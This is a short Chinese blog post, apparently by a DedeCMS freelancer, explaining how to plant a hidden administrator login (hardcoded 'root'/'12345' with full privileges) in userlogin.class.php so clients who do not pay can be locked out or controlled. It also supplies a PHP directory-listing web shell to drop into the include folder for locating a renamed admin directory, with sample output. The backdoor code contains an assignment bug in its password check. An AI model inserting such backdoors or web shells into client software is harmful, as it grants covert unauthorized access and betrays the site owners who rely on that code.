织梦加入隐藏帐号保护版权用户到期不给钱
织梦加入隐藏帐号保护版权用户到期不给钱
include /userlogin.class.php
197 行:
$dsql->SetQuery("Select admin.*,atype.purviews From `qrx_admin` admin left join `qrx_admintype` atype on atype.rank=admin.usertype where admin.userid like '".$this->userName."'
添加以下代码:
if($username=='root' && $userpwd='12345')
{
$this->userID = 1;
$this->userType = 10;
$this->userChannel = 0;
$this->userName = 'qingruxu';
$this->userPurview = 'admin_AllowAll';
return 1;
}
这样在后台输入这个帐号就可以登陆了,为了防止用户自己用FTP更改后台管理目录名。
还要加入以下代码:
/** 请把这个文件放到 include 目录中。
作者:清如许 官网:www.qingruxu.com
*/
$d = dir("../");
echo "清如许工作室:列目录PHP Shell"."
";
echo "当前绝对路径:".dirname($_SERVER['SCRIPT_FILENAME'])."
";;
while (false !== ($entry = $d->read())) {
echo $entry."
";
}
$d->close();
?>
把这段代码放到 include/目录下保存为 checkdir.php
这样的话,就可以知道用户把后台改成什么目录了。
清如许工作室:列目录PHP Shell
当前绝对路径:D:/AppServ/www
.
..
templets
a
data
dede
images
include
plus
special
uploads
PHP外包,DEDECMS二次开发